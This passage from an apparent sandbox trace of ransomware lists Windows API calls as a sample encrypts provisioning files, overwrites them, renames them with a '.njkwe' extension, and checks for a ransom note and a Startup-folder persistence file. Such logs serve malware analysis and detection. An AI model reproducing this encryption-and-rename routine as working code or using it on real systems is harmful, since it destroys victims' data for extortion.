0x1153aa4 [0077.315] GetTickCount () returned 0x1153aa4 [0077.315] GetTickCount () returned 0x1153aa4 [0077.315] GetTickCount () returned 0x1153aa4 [0077.315] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.315] GetProcessHeap () returned 0xbe0000 [0077.315] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.315] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0077.317] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.317] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0077.317] GetProcessHeap () returned 0xbe0000 [0077.317] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.317] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.317] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.317] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.318] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.318] CloseHandle (hObject=0x43c) returned 1 [0077.318] GetProcessHeap () returned 0xbe0000 [0077.318] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.318] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\207__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0077.318] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\207__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\207__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\207__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\207__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.318] GetProcessHeap () returned 0xbe0000 [0077.318] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.318] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x907cb89c, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x907cb89c, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x907cb89c, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2ca, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="208__Connections_Cellular_Cellcom (Israel)_i0$(__MVID)@WAP.provxml", cAlternateFileName="208__C~1.PRO")) returned 1 [0077.320] lstrcmpiW (lpString1="208__Connections_Cellular_Cellcom (Israel)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.320] lstrcmpiW (lpString1="208__Connections_Cellular_Cellcom (Israel)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.320] lstrcmpiW (lpString1="208__Connections_Cellular_Cellcom (Israel)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.320] lstrcmpiW (lpString1="208__Connections_Cellular_Cellcom (Israel)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.320] lstrcmpiW (lpString1="208__Connections_Cellular_Cellcom (Israel)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.320] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\208__Connections_Cellular_Cellcom (Israel)_i0$(__MVID)@WAP.provxml") returned 160 [0077.320] StrStrIW (lpFirst="208__Connections_Cellular_Cellcom (Israel)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.321] lstrcmpW (lpString1="208__Connections_Cellular_Cellcom (Israel)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.321] lstrcmpW (lpString1="208__Connections_Cellular_Cellcom (Israel)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.321] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\208__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.321] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\208__Connections_Cellular_Cellcom (Israel)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\208__connections_cellular_cellcom (israel)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.321] GetTickCount () returned 0x1153aa4 [0077.321] GetTickCount () returned 0x1153aa4 [0077.321] GetTickCount () returned 0x1153aa4 [0077.321] GetTickCount () returned 0x1153aa4 [0077.321] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.321] GetProcessHeap () returned 0xbe0000 [0077.321] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.321] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2ca, lpOverlapped=0x0) returned 1 [0077.324] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd36, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.324] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2ca, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2ca, lpOverlapped=0x0) returned 1 [0077.324] GetProcessHeap () returned 0xbe0000 [0077.324] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.324] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.324] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.325] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.325] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.325] CloseHandle (hObject=0x43c) returned 1 [0077.325] GetProcessHeap () returned 0xbe0000 [0077.325] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.325] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\208__Connections_Cellular_Cellcom (Israel)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0077.325] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\208__Connections_Cellular_Cellcom (Israel)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\208__connections_cellular_cellcom (israel)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\208__Connections_Cellular_Cellcom (Israel)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\208__connections_cellular_cellcom (israel)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.326] GetProcessHeap () returned 0xbe0000 [0077.326] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.326] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x907cb89c, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x907cb89c, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x907cb89c, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="209__Connections_Cellular_Orange (Israel)_i0$(__MVID)@WAP.provxml", cAlternateFileName="209__C~1.PRO")) returned 1 [0077.326] lstrcmpiW (lpString1="209__Connections_Cellular_Orange (Israel)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.326] lstrcmpiW (lpString1="209__Connections_Cellular_Orange (Israel)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.326] lstrcmpiW (lpString1="209__Connections_Cellular_Orange (Israel)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.326] lstrcmpiW (lpString1="209__Connections_Cellular_Orange (Israel)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.326] lstrcmpiW (lpString1="209__Connections_Cellular_Orange (Israel)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.326] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\209__Connections_Cellular_Orange (Israel)_i0$(__MVID)@WAP.provxml") returned 159 [0077.326] StrStrIW (lpFirst="209__Connections_Cellular_Orange (Israel)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.326] lstrcmpW (lpString1="209__Connections_Cellular_Orange (Israel)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.326] lstrcmpW (lpString1="209__Connections_Cellular_Orange (Israel)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.326] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\209__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.326] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\209__Connections_Cellular_Orange (Israel)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\209__connections_cellular_orange (israel)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.326] GetTickCount () returned 0x1153aa4 [0077.326] GetTickCount () returned 0x1153aa4 [0077.326] GetTickCount () returned 0x1153aa4 [0077.326] GetTickCount () returned 0x1153aa4 [0077.326] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.326] GetProcessHeap () returned 0xbe0000 [0077.326] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.326] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c8, lpOverlapped=0x0) returned 1 [0077.328] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.328] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c8, lpOverlapped=0x0) returned 1 [0077.329] GetProcessHeap () returned 0xbe0000 [0077.329] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.329] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.329] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.329] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.329] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.329] CloseHandle (hObject=0x43c) returned 1 [0077.329] GetProcessHeap () returned 0xbe0000 [0077.329] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.329] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\209__Connections_Cellular_Orange (Israel)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0077.329] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\209__Connections_Cellular_Orange (Israel)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\209__connections_cellular_orange (israel)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\209__Connections_Cellular_Orange (Israel)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\209__connections_cellular_orange (israel)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.330] GetProcessHeap () returned 0xbe0000 [0077.330] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.330] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90163088, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90163088, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90163088, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2e5, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="20__Connections_Cellular_Telstra (Australia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="20__CO~1.PRO")) returned 1 [0077.330] lstrcmpiW (lpString1="20__Connections_Cellular_Telstra (Australia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.330] lstrcmpiW (lpString1="20__Connections_Cellular_Telstra (Australia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.330] lstrcmpiW (lpString1="20__Connections_Cellular_Telstra (Australia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.330] lstrcmpiW (lpString1="20__Connections_Cellular_Telstra (Australia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.330] lstrcmpiW (lpString1="20__Connections_Cellular_Telstra (Australia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.330] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\20__Connections_Cellular_Telstra (Australia)_i0$(__MVID)@WAP.provxml") returned 162 [0077.330] StrStrIW (lpFirst="20__Connections_Cellular_Telstra (Australia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.330] lstrcmpW (lpString1="20__Connections_Cellular_Telstra (Australia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.330] lstrcmpW (lpString1="20__Connections_Cellular_Telstra (Australia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.330] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\20__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.330] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\20__Connections_Cellular_Telstra (Australia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\20__connections_cellular_telstra (australia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.331] GetTickCount () returned 0x1153ab4 [0077.331] GetTickCount () returned 0x1153ab4 [0077.331] GetTickCount () returned 0x1153ab4 [0077.331] GetTickCount () returned 0x1153ab4 [0077.331] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.331] GetProcessHeap () returned 0xbe0000 [0077.331] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.331] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2e5, lpOverlapped=0x0) returned 1 [0077.332] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd1b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.332] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2e5, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2e5, lpOverlapped=0x0) returned 1 [0077.332] GetProcessHeap () returned 0xbe0000 [0077.332] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.332] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.333] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.333] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.333] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.333] CloseHandle (hObject=0x43c) returned 1 [0077.333] GetProcessHeap () returned 0xbe0000 [0077.333] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.333] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\20__Connections_Cellular_Telstra (Australia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0077.333] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\20__Connections_Cellular_Telstra (Australia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\20__connections_cellular_telstra (australia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\20__Connections_Cellular_Telstra (Australia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\20__connections_cellular_telstra (australia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.334] GetProcessHeap () returned 0xbe0000 [0077.334] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.334] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x907cb89c, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x907cb89c, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x907cb89c, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x354, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="210__Connections_Cellular_Pelephone (Israel)_i0$(__MVID)@WAP.provxml", cAlternateFileName="210__C~1.PRO")) returned 1 [0077.334] lstrcmpiW (lpString1="210__Connections_Cellular_Pelephone (Israel)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.334] lstrcmpiW (lpString1="210__Connections_Cellular_Pelephone (Israel)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.334] lstrcmpiW (lpString1="210__Connections_Cellular_Pelephone (Israel)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.334] lstrcmpiW (lpString1="210__Connections_Cellular_Pelephone (Israel)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.334] lstrcmpiW (lpString1="210__Connections_Cellular_Pelephone (Israel)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.334] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\210__Connections_Cellular_Pelephone (Israel)_i0$(__MVID)@WAP.provxml") returned 162 [0077.334] StrStrIW (lpFirst="210__Connections_Cellular_Pelephone (Israel)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.334] lstrcmpW (lpString1="210__Connections_Cellular_Pelephone (Israel)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.334] lstrcmpW 